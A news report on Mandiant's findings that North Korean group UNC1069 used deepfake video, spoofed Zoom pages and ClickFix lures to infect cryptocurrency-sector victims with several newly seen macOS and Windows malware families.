North Korean hackers have orchestrated targeted campaigns against the cryptocurrency sector, using AI-generated deepfake video and the ClickFix social engineering technique to deliver malware to both macOS and Windows systems, according to new findings from Google’s Mandiant team.
The activity, which Mandiant attributes to the long-tracked threat group UNC1069, appears financially motivated and was uncovered during an investigation into an attack on a fintech company. Researchers say the operation began with a message sent over Telegram from a compromised account belonging to a cryptocurrency company executive.
After establishing trust, the attackers shared a Calendly link that led the victim to a spoofed Zoom meeting page hosted on attacker-controlled infrastructure. During the fake meeting, the victim was shown what appeared to be a deepfake video of a CEO from another cryptocurrency firm. The attackers then claimed there were audio issues and instructed the victim to run troubleshooting commands displayed on a webpage. The commands initiated the malware infection chain on both macOS and Windows.
At the start the macOS compromise, the threat actor executed AppleScript and then deployed a malicious Mach-O binary. In total, the researchers observed seven distinct macOS malware families installed on the victim’s system, including multiple backdoors, downloaders, and data-stealing tools (Waveshaper, Hypercall, Hidencall, Silencelift, Deepbreath, Sugarloader, and Chromepush) designed to harvest credentials, browser data, messaging app content, and even bypass macOS privacy protections.
Mandiant says it is unusual to see so many malware tools deployed against a single target.
Some of the malware communicated with command-and-control (C&C) servers over HTTP, HTTPS, or WebSockets, while other tools established persistence through launch daemons or masqueraded as legitimate browser extensions. Mandiant noted that several of the tools, including Silencelift, Deepbreath, and Chromepush, have not previously been observed in the UNC1069 arsenal and most of the malware has little to no detection on public scanning platforms.